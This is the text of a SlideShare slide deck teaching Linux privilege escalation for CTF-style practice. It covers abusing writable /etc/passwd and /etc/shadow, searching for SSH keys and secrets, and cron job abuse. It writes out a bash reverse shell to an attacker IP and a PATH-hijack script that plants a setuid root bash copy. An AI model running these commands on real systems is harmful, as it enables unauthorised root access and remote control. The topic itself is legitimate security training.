SlideShare a Scribd company logo

Linux privesc.pptx

Download as PPTX, PDF
S
SouvikRoy114738

The document discusses privilege escalation (privesc) in Linux, distinguishing between horizontal and vertical privilege escalation. It highlights file permissions, particularly the /etc/shadow and /etc/passwd files, which can be manipulated to gain higher user privileges. Additionally, it covers the abuse of cron jobs to escalate privileges by executing scripts that can rewrite binaries.

Software
1 of 9
Download to read offline
1
2
3
4
5
6
7
8
9
Linux privesc.pptx
About Me: @VISHAL MOHAN @4+ YEARS OF EXP @INFORMATION SECURITY CONSULTANT @CVES. HOF, BOUNTIES
TODAYS TOPIC: ‱ FILE PERMISSION ‱ SECRETS ‱ CRONJOB ABUSE
What Is Privesc? Minimum functionality of a user (customer) to higher privilege user conversion (admin]. Linux Privesc: When you try to exploit the webapp and get reverse shell (Linux machine) you will get www-data  which is a low privileged shell. 1.Horizontal Privilege 2.vertical Privilege Horizontal Privesc: Gaining access of User privilege  /home/vishal This Privilege is which is equal to www-data, mostly we used it to find the Flag In CTFs like HTB. Vertical Privesc: Gaining access of root privilege from User priv.
FILE PERMISSION Shadow File : users “Passwords” will be stored in this File. /etc/shadow  World Readable  read & crack the hash /etc/shadow  World Writable  Change the password for Root Password File /etc/passwd  World Writable  change the hash for root user  change the UID & GID By changing the hash value in password file, this passwd consider as a preference By changing the UID & GID as 0 , It consider as root user Sudo Binay Abuse
SECRETS  History Files  Config Files  SSH Keys History file After getting initial shell to the machine, always check home directories files and hidden files Configuration File In linux many services or 3rd party software may be running , You may find Passwords, Keys, API in it. SSH Keys One may find hidden directories Eg: /var/backups /opt find / -name authorized_keys 2> dev/null find / -name id_rsa 2> dev/null
CRON JOBS To perform task at scheduled time To check the user’s cronjob if any cronjob is created crontab –l cat /etc/crobtab bash -i >& /dev/tcp/10.2.12.26/4444 0>&1 1st line: shebang to denote interpreter, this case — bash 2nd line: bash -i to open an interactive shell, >& /dev/tcp/10.2.12.26/4444 to redirect all streams to our local machine and 0>&1 to redirect stdin and stdout to stdout To check the cronjobs in automated tool “pspy”
Path Environment Variable Cat /etc/crontab Note that the PATH variable starts with /home/user which is our user’s home directory. Create a file called overwrite.sh in your home directory with the following contents: #!/Bin/bash cp /bin/bash /tmp/rootbash Chmod +xs /tmp/rootbash Ovewriting binbash to /tmp/rootbash Changed it to suit binary Wait for cronjob to run and to gain root prievelge run below /tmp/rootbash -p
Linux privesc.pptx

More Related Content

PDF
Check Your Privilege (Escalation)
Bishop Fox
 
PDF
Linux advanced privilege escalation
Jameel Nabbo
 
PPTX
Linux basics part 1
Lilesh Pathe
 
PPTX
Linux privilege escalation
SongchaiDuangpan
 
PPTX
Introduction 2 linux
Papu Kumar
 
PPT
Unix/Linux Basic Commands and Shell Script
sbmguys
 
PPT
Unix Security
replay21
 
PDF
Exploiting Directory Permissions on macOS
Csaba Fitzl
 
Check Your Privilege (Escalation)
Bishop Fox
 
Linux advanced privilege escalation
Jameel Nabbo
 
Linux basics part 1
Lilesh Pathe
 
Linux privilege escalation
SongchaiDuangpan
 
Introduction 2 linux
Papu Kumar
 
Unix/Linux Basic Commands and Shell Script
sbmguys
 
Unix Security
replay21
 
Exploiting Directory Permissions on macOS
Csaba Fitzl
 

Similar to Linux privesc.pptx (20)

PDF
Introduction to Linux Privilege Escalation Methods
Bishop Fox
 
PPT
Linux
SINGH PROJECTS
 
PPTX
Death matchtournament del2014
Nabil Munawar
 
PPTX
Linux week 2
Vinoth Sn
 
PDF
Unit 6 adding new users and storage
Bhushan Pawar -Java Trainer
 
PPTX
Chapter 3 LectureChapter 3 LectureChapter 3 Lecture.pptx
ShahKhir1
 
PDF
Hadoop Security, Cloudera - Todd Lipcon and Aaron Myers - Hadoop World 2010
Cloudera, Inc.
 
PDF
1000 to 0
Sunny Neo
 
PPTX
Linux 4 you
Shashwat Shriparv
 
PDF
Solaris basics
Ashwin Pawar
 
PDF
60761 linux
Ritika Ahlawat
 
DOCX
Clustering manual
Md. Mahedi Mahfuj
 
PPT
Lamp technology
2tharan21
 
PPT
Linux lecture
Paktia University
 
PPT
Linux
sravan kumar
 
PDF
Slides 29-07-2017
Soumyak Bhattacharyya
 
PPT
Host security
Nguyen Tam
 
PPT
Host security
Nguyen Tam
 
PDF
Running the Apache Web Server
webhostingguy
 
PPT
Sandy Report
sandeepkumar907
 
Introduction to Linux Privilege Escalation Methods
Bishop Fox
 
Linux
SINGH PROJECTS
 
Death matchtournament del2014
Nabil Munawar
 
Linux week 2
Vinoth Sn
 
Unit 6 adding new users and storage
Bhushan Pawar -Java Trainer
 
Chapter 3 LectureChapter 3 LectureChapter 3 Lecture.pptx
ShahKhir1
 
Hadoop Security, Cloudera - Todd Lipcon and Aaron Myers - Hadoop World 2010
Cloudera, Inc.
 
1000 to 0
Sunny Neo
 
Linux 4 you
Shashwat Shriparv
 
Solaris basics
Ashwin Pawar
 
60761 linux
Ritika Ahlawat
 
Clustering manual
Md. Mahedi Mahfuj
 
Lamp technology
2tharan21
 
Linux lecture
Paktia University
 
Linux
sravan kumar
 
Slides 29-07-2017
Soumyak Bhattacharyya
 
Host security
Nguyen Tam
 
Host security
Nguyen Tam
 
Running the Apache Web Server
webhostingguy
 
Sandy Report
sandeepkumar907
 
Ad

Recently uploaded (20)

PDF
Design an Analysis of Algorithms I-SECS-1021-03
DilanEscobar1
 
PPTX
L1 - Introduction to python Backend.pptx
MoizAhmed480282
 
PDF
Internet Downloader Manager (IDM) Crack 6.42 Build 42 Updates Latest 2025
itskinga12
 
PDF
2025 Textile ERP Trends: SAP, Odoo & Oracle
Aetos Technologies
 
PPTX
Reimagine Home Health with the Power of Agentic AI​
AutomationEdge Technologies
 
PDF
Adobe Illustrator 28.6 Crack My Vision of Vector Design
ghrom2211g
 
PDF
medical staffing services at VALiNTRY
Tiyan Grayson
 
PDF
Understanding Forklifts - TECH EHS Solution
TECH EHS Solution
 
PDF
How to Migrate SBCGlobal Email to Yahoo Easily
raymondjones7273
 
PDF
Claude Code: Everyone is a 10x Developer - A Comprehensive AI-Powered CLI Tool
William Chong
 
PDF
How to Choose the Right IT Partner for Your Business in Malaysia
Asian Business Services & Technologies
 
PPTX
Essential Infomation Tech presentation.pptx
pradeepjava2016
 
PDF
Design an Analysis of Algorithms II-SECS-1021-03
DilanEscobar1
 
PPTX
Transform Your Business with a Software ERP System
Canada Software Company
 
PDF
Wondershare Filmora 15 Crack With Activation Key [2025
ghrom2211g
 
PDF
Softaken Excel to vCard Converter Software.pdf
markwillsonmw004
 
PDF
System and Network Administration Chapter 2
jaramharo
 
PDF
Internet Downloader Manager (IDM) Crack 6.42 Build 41
ghrom2211g
 
PDF
Odoo Companies in India – Driving Business Transformation.pdf
azhuhardeen1968
 
PDF
Why TechBuilder is the Future of Pickup and Delivery App Development (1).pdf
TechBuilder
 
Design an Analysis of Algorithms I-SECS-1021-03
DilanEscobar1
 
L1 - Introduction to python Backend.pptx
MoizAhmed480282
 
Internet Downloader Manager (IDM) Crack 6.42 Build 42 Updates Latest 2025
itskinga12
 
2025 Textile ERP Trends: SAP, Odoo & Oracle
Aetos Technologies
 
Reimagine Home Health with the Power of Agentic AI​
AutomationEdge Technologies
 
Adobe Illustrator 28.6 Crack My Vision of Vector Design
ghrom2211g
 
medical staffing services at VALiNTRY
Tiyan Grayson
 
Understanding Forklifts - TECH EHS Solution
TECH EHS Solution
 
How to Migrate SBCGlobal Email to Yahoo Easily
raymondjones7273
 
Claude Code: Everyone is a 10x Developer - A Comprehensive AI-Powered CLI Tool
William Chong
 
How to Choose the Right IT Partner for Your Business in Malaysia
Asian Business Services & Technologies
 
Essential Infomation Tech presentation.pptx
pradeepjava2016
 
Design an Analysis of Algorithms II-SECS-1021-03
DilanEscobar1
 
Transform Your Business with a Software ERP System
Canada Software Company
 
Wondershare Filmora 15 Crack With Activation Key [2025
ghrom2211g
 
Softaken Excel to vCard Converter Software.pdf
markwillsonmw004
 
System and Network Administration Chapter 2
jaramharo
 
Internet Downloader Manager (IDM) Crack 6.42 Build 41
ghrom2211g
 
Odoo Companies in India – Driving Business Transformation.pdf
azhuhardeen1968
 
Why TechBuilder is the Future of Pickup and Delivery App Development (1).pdf
TechBuilder
 
Ad

Linux privesc.pptx

  • 2. About Me: @VISHAL MOHAN @4+ YEARS OF EXP @INFORMATION SECURITY CONSULTANT @CVES. HOF, BOUNTIES
  • 3. TODAYS TOPIC: ‱ FILE PERMISSION ‱ SECRETS ‱ CRONJOB ABUSE
  • 4. What Is Privesc? Minimum functionality of a user (customer) to higher privilege user conversion (admin]. Linux Privesc: When you try to exploit the webapp and get reverse shell (Linux machine) you will get www-data  which is a low privileged shell. 1.Horizontal Privilege 2.vertical Privilege Horizontal Privesc: Gaining access of User privilege  /home/vishal This Privilege is which is equal to www-data, mostly we used it to find the Flag In CTFs like HTB. Vertical Privesc: Gaining access of root privilege from User priv.
  • 5. FILE PERMISSION Shadow File : users “Passwords” will be stored in this File. /etc/shadow  World Readable  read & crack the hash /etc/shadow  World Writable  Change the password for Root Password File /etc/passwd  World Writable  change the hash for root user  change the UID & GID By changing the hash value in password file, this passwd consider as a preference By changing the UID & GID as 0 , It consider as root user Sudo Binay Abuse
  • 6. SECRETS  History Files  Config Files  SSH Keys History file After getting initial shell to the machine, always check home directories files and hidden files Configuration File In linux many services or 3rd party software may be running , You may find Passwords, Keys, API in it. SSH Keys One may find hidden directories Eg: /var/backups /opt find / -name authorized_keys 2> dev/null find / -name id_rsa 2> dev/null
  • 7. CRON JOBS To perform task at scheduled time To check the user’s cronjob if any cronjob is created crontab –l cat /etc/crobtab bash -i >& /dev/tcp/10.2.12.26/4444 0>&1 1st line: shebang to denote interpreter, this case — bash 2nd line: bash -i to open an interactive shell, >& /dev/tcp/10.2.12.26/4444 to redirect all streams to our local machine and 0>&1 to redirect stdin and stdout to stdout To check the cronjobs in automated tool “pspy”
  • 8. Path Environment Variable Cat /etc/crontab Note that the PATH variable starts with /home/user which is our user’s home directory. Create a file called overwrite.sh in your home directory with the following contents: #!/Bin/bash cp /bin/bash /tmp/rootbash Chmod +xs /tmp/rootbash Ovewriting binbash to /tmp/rootbash Changed it to suit binary Wait for cronjob to run and to gain root prievelge run below /tmp/rootbash -p